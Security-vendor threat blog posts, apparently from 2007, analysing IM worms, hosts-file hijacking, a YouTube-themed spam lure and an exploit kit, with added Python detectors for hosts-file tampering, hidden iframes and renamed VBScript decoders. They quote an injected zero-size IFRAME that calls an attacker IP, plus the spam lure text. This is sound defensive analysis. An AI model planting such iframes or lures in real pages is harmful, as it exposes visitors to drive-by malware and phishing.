We are all familiar with IM worms and the different techniques they use to get downloaded and executed on a target machine. One of them is WORM_SOHANAD (a.k.a. worm_sohanat, worm_imaut, worm_autoit), which leverages the MS06-014 MDAC vulnerability. There is a previous blog entry regarding this malware here.
Today, I would like to show another twist on the social engineering used by this malware. This time it uses a fake Google page (shown below) in which every hyperlink points back to the same page, and which also contains a link to the malware itself.
As the page says, we have to download an "add-on", which is actually the malware. Checking the source code of the page, we find three obfuscated scripts.
Which, when deobfuscated, result in:
The files "home.exe" and "zun.exe" are identical; Trend Micro already detects them as WORM_SOHANAT.CO, while the other binary, "zin.exe", is detected as WORM_VB.EIQ.
Another thing to note is that the malware appends entries to the target user's "hosts" file. As a result, any attempt to access one of the listed web sites is redirected to the malware web page, since the hosts file is consulted before DNS.
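A hosts-file hijack of the kind described above is easy to check for on a suspect machine, because the malware has to leave a public-looking hostname pinned to an address it controls. The following is an added example (not code from the original post) that parses the plain hosts-file syntax and flags hostnames mapped to anything other than loopback, link-local, unspecified or RFC 1918/ULA addresses; the hostnames and addresses in the sample are constructed for the example, not taken from the malware.

```python
"""Flag hosts-file entries that pin a hostname to an external address.

Added example, not part of the original post. The sample hosts file and
every address in it are constructed for illustration.
"""
import ipaddress

# Constructed sample: the first entries are normal, the last two lines
# imitate entries appended by malware to hijack a vendor's web sites.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost

192.168.1.20    printer.lan          # office printer
203.0.113.77    www.example-av-vendor.test
203.0.113.77    update.example-av-vendor.test downloads.example-av-vendor.test
"""

# Names that legitimately live in every hosts file.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}

# RFC 1918 and IPv6 ULA ranges; entries pointing here are normal LAN records.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def is_internal(addr):
    """True for loopback, link-local, unspecified (0.0.0.0 ad-blocking
    entries) and private/ULA addresses; False for anything routable."""
    if addr.is_loopback or addr.is_link_local or addr.is_unspecified:
        return True
    # 'in' returns False when the address and network versions differ.
    return any(addr in net for net in INTERNAL_NETS)


def parse_hosts(text):
    """Return (address, hostname) pairs, one per hostname, skipping
    comments, blank lines and lines whose first field is not an address."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                                 # malformed line
        for name in fields[1:]:
            entries.append((addr, name.lower()))
    return entries


def suspicious_entries(text):
    """Return [(address, hostname)] for non-local names that resolve
    to an external address: the fingerprint of a malware-appended entry."""
    return [(str(addr), name) for addr, name in parse_hosts(text)
            if name not in LOCAL_NAMES and not is_internal(addr)]


def redirect_map(text):
    """Group the flagged hostnames by address: one external IP collecting
    several well-known names is the usual shape of a redirection attack."""
    grouped = {}
    for addr, name in suspicious_entries(text):
        grouped.setdefault(addr, []).append(name)
    return grouped


if __name__ == "__main__":
    for addr, names in redirect_map(SAMPLE_HOSTS).items():
        print(f"{addr} hijacks: {', '.join(names)}")
```

On a real machine, feed the function the contents of `%SystemRoot%\System32\drivers\etc\hosts` (Windows) or `/etc/hosts`; an entry pointing a vendor's update or download hostname at an address outside your own networks is exactly what this malware leaves behind.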
Malware authors constantly modify and add techniques to get their malware executed on vulnerable users' machines. However, users can protect themselves from threats like this by applying security patches and keeping their anti-virus signatures up to date.
Archive for August 29th, 2007
After ECARD.EXE, PATCH.EXE and MSDATAACCESS.EXE, now comes VIDEO.EXE. Trend Micro Senior Threat Research Consultant Ivan Macalintal says it was only a matter of time.
He reports receiving in his inbox what could be a rehash of the infamous Storm Trojan, a.k.a. NUWAR, which raged during the first quarter of this year and has been constantly evolving since. Its latest trick is to piggyback on the popularity of YouTube, with spammed email messages containing links that supposedly lead to a YouTube video. The email contains the following details:
Subject: are you kidding me? lol
Message body:
Man you have got to tell me where you picked her up. I saw this on the web, it has to be you. take a look, lol…
http://www.youtube.com/watch?v={BLOCKED}kBbE
Once a user falls for this social engineering technique and clicks the link, he/she is redirected to a certain IP address, in this case http://{BLOCKED}.190.132, which is obviously not YouTube but instead serves an HTML page that uses a YouTube logo and the following message:
Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can click here to launch the download and then press Run.
The link eventually leads users to download the malicious file named VIDEO.EXE.
TrendLabs detects the file as WORM_ZHELATI.MAB. Users are advised to be wary of email messages of this nature.
TrendLabs has identified more Web pages that have been compromised to contain an IFRAME tag redirecting users to a malicious IP address, which in turn leads to the download of malicious files. The compromised Web pages, which Trend Micro detects as HTML_IFRAME.GN, carry news articles about new technologies and, ironically, about the latest malware threats. The articles even include a report on the recent Monster.com attack.
The IFRAME tag, inserted at the bottom of the page so that it loads invisibly (zero width and height, no border), looks something like this:
<iframe src='http://81.{BLOCKED}.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
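The injected tag above has a recognisable shape: a frame sized to nothing, pointing off-site at a bare IP address. The following is an added example (not code from the original post or from Trend Micro) that walks a page with the standard-library HTML parser and reports iframes that are hidden by size or CSS, noting when their source is off-site or an IP literal. The sample page is constructed; the 192.0.2.10 address is a documentation address standing in for the {BLOCKED} value, not the real one.

```python
"""Detect hidden, off-site IFRAME injections in an HTML page.

Added example, not part of the original post. The sample page, its host
name and the frame's address are constructed for illustration.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: one legitimate embed and one injected frame modelled
# on the tag quoted above (documentation IP in place of the real one).
SAMPLE_PAGE = """<html><body>
<h1>Tech news</h1>
<iframe src="https://news.example/embed/video?id=42" width="560" height="315"></iframe>
<p>Article text about the latest malware threats...</p>
<iframe src='http://192.0.2.10/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
</body></html>"""


def _px(value):
    """Parse '0', '0px' or ' 1 ' into an int; None if absent or non-numeric."""
    if value is None:
        return None
    m = re.match(r"\s*(-?\d+)", value)
    return int(m.group(1)) if m else None


def _style_hides(style):
    """True if inline CSS collapses or hides the element."""
    s = re.sub(r"\s+", "", style or "").lower()
    return any(tok in s for tok in
               ("display:none", "visibility:hidden", "width:0", "height:0"))


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> start tags that are hidden; annotate where they point."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)                      # attribute names arrive lowercased
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("zero-size")
        if _style_hides(a.get("style")):
            reasons.append("css-hidden")
        if not reasons:
            return                           # visible frame: not our concern
        src = a.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append("off-site")
        if host and _is_ip_literal(host):
            reasons.append("ip-literal")
        self.findings.append({"src": src, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return a list of {'src': ..., 'reasons': [...]} for hidden frames."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE, "news.example"):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

A hidden frame on its own is not proof of compromise (analytics beacons use the same trick), which is why the off-site and IP-literal flags are reported separately: a zero-size frame whose source is a raw IP on another network is the combination worth pulling the page for.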
Trend Micro threat analysts report that this malicious IP address is owned by the Russian Business Network. When this attack was first reported, the downloaded files appeared to belong to the Banker Trojan family, and the configuration data was requested from http://75.{BLOCKED}.148/.c/o/cfg.bin. As of this writing, however, the attack seems to have switched servers and now attempts to download exploit code, such as EXPL_EXECOD.A and EXPL_ANICMOO.GEN.
Meanwhile, TrendLabs has also discovered a new Web threat attack kit, which works much the same way as Web Attacker, Mpack, or Icepack. It is very similar to the kit discussed in The 404 Story, but this time we found nine exploit pages instead of seven, all of which ultimately lead to the download of the malicious file VERS.PHP, which Trend Micro detects as TROJ_DLOADER.PGW.
Based on analysis by Senior Threat Expert Ivan Macalintal, the obfuscated malicious scripts on the exploit pages are still undetected. To make matters worse, the n404-X HTM pages (where X is a number from 1 to 9) evolve and change every 5-10 minutes, producing ever more malicious pages (currently more than 130 sites and counting).
Further investigation reveals that the malicious domain is again hosted by none other than the Russian Business Network. This kit also uses VBScript; however, this time it has randomized variable names that are probably different every time, so a byte-level signature taken from one copy will not match the next. Threat analyst David Sancho also noted that not a single line of code was visible in the first infectious HTML. "These people are making extra efforts to prevent automated detection of JavaScript decoders," he says.
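Randomized variable names defeat signatures that hash the script bytes, but the decoder logic underneath stays the same from one regenerated page to the next. The usual analyst response is to canonicalize the script before hashing: strip comments and whitespace, and replace every non-keyword identifier with a placeholder numbered by first appearance. The following is an added example of that technique (not code from the original post or from the kit itself); the two VBScript snippets are constructed to imitate one decoder loop regenerated with fresh names, and the keyword list is a deliberately small assumption, not a complete VBScript grammar.

```python
"""Canonicalize a VBScript snippet so renamed variants hash the same.

Added example, not part of the original post. The sample scripts are
constructed; KEYWORDS is a small, assumed subset of VBScript keywords
and built-ins, enough for the sample and easily extended.
"""
import hashlib
import re

# Constructed sample A: a hex-decoding loop that Execute()s its result.
SAMPLE_A = """Dim xq9, zk2, i
xq9 = "68656C6C6F"   ' hex-encoded payload
zk2 = ""
For i = 1 To Len(xq9) Step 2
    zk2 = zk2 & Chr("&H" & Mid(xq9, i, 2))
Next
Execute zk2
"""

# Constructed sample B: the same logic with different names, spacing and comments,
# as a regenerated exploit page would present it.
SAMPLE_B = """' regenerated copy: same logic, fresh names
Dim vn7,qa3,j
vn7="68656C6C6F"
qa3=""
For j=1 To Len(vn7) Step 2
qa3=qa3&Chr("&H"&Mid(vn7,j,2))
Next
Execute qa3
"""

# Assumed keyword/built-in subset: these keep their (lowercased) spelling;
# anything else that looks like an identifier is treated as a variable.
KEYWORDS = {
    "dim", "set", "function", "end", "sub", "if", "then", "else", "elseif",
    "for", "next", "to", "step", "do", "loop", "while", "wend", "call",
    "nothing", "true", "false", "and", "or", "not", "each", "in", "on",
    "error", "resume", "goto", "const", "redim", "exit", "select", "case",
    "chr", "mid", "len", "asc", "execute", "eval", "createobject",
    "unescape", "replace", "split", "msgbox", "document", "window",
    "write", "wscript", "instr", "lcase", "ucase",
}

TOKEN_RE = re.compile(r"""
    (?P<comment>'[^\n]*)                         # comment to end of line
  | (?P<string>"(?:[^"]|"")*")                   # string literal, "" escapes
  | (?P<ident>[A-Za-z_][A-Za-z0-9_]*)
  | (?P<number>&H[0-9A-Fa-f]+|\d+(?:\.\d+)?)     # hex or decimal literal
  | (?P<ws>\s+)
  | (?P<op>.)                                    # any other single character
""", re.VERBOSE | re.DOTALL)


def normalize(src):
    """Return a whitespace-insensitive token string with comments removed,
    keywords lowercased and variables renamed id0, id1, ... in order of
    first use. String literals are kept: they are the decoder's payload."""
    out, names = [], {}
    for m in TOKEN_RE.finditer(src):
        kind, text = m.lastgroup, m.group()
        if kind in ("comment", "ws"):
            continue
        if kind == "ident":
            low = text.lower()
            if low in KEYWORDS:
                out.append(low)
            else:
                out.append(names.setdefault(low, f"id{len(names)}"))
        else:
            out.append(text)
    return " ".join(out)


def signature(src):
    """SHA-256 of the normalized form: stable across variable renaming."""
    return hashlib.sha256(normalize(src).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    print(normalize(SAMPLE_A))
    print("same signature:", signature(SAMPLE_A) == signature(SAMPLE_B))
```

The normalized form is what you would feed a signature or clustering system instead of the raw page: two pages that differ only in names, spacing and comments collapse to one entry, while a change to the actual decoding logic still produces a new one.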
The complexity of this behavior makes these pages quite difficult to detect, since there is no telling how many more iterations and generations of malicious scripts can be produced. However, Trend Micro continuously monitors these malicious sites in order to add all undetected scripts and binaries to its signatures. Users are advised to watch out for these sites, as they are still up and running as of this writing.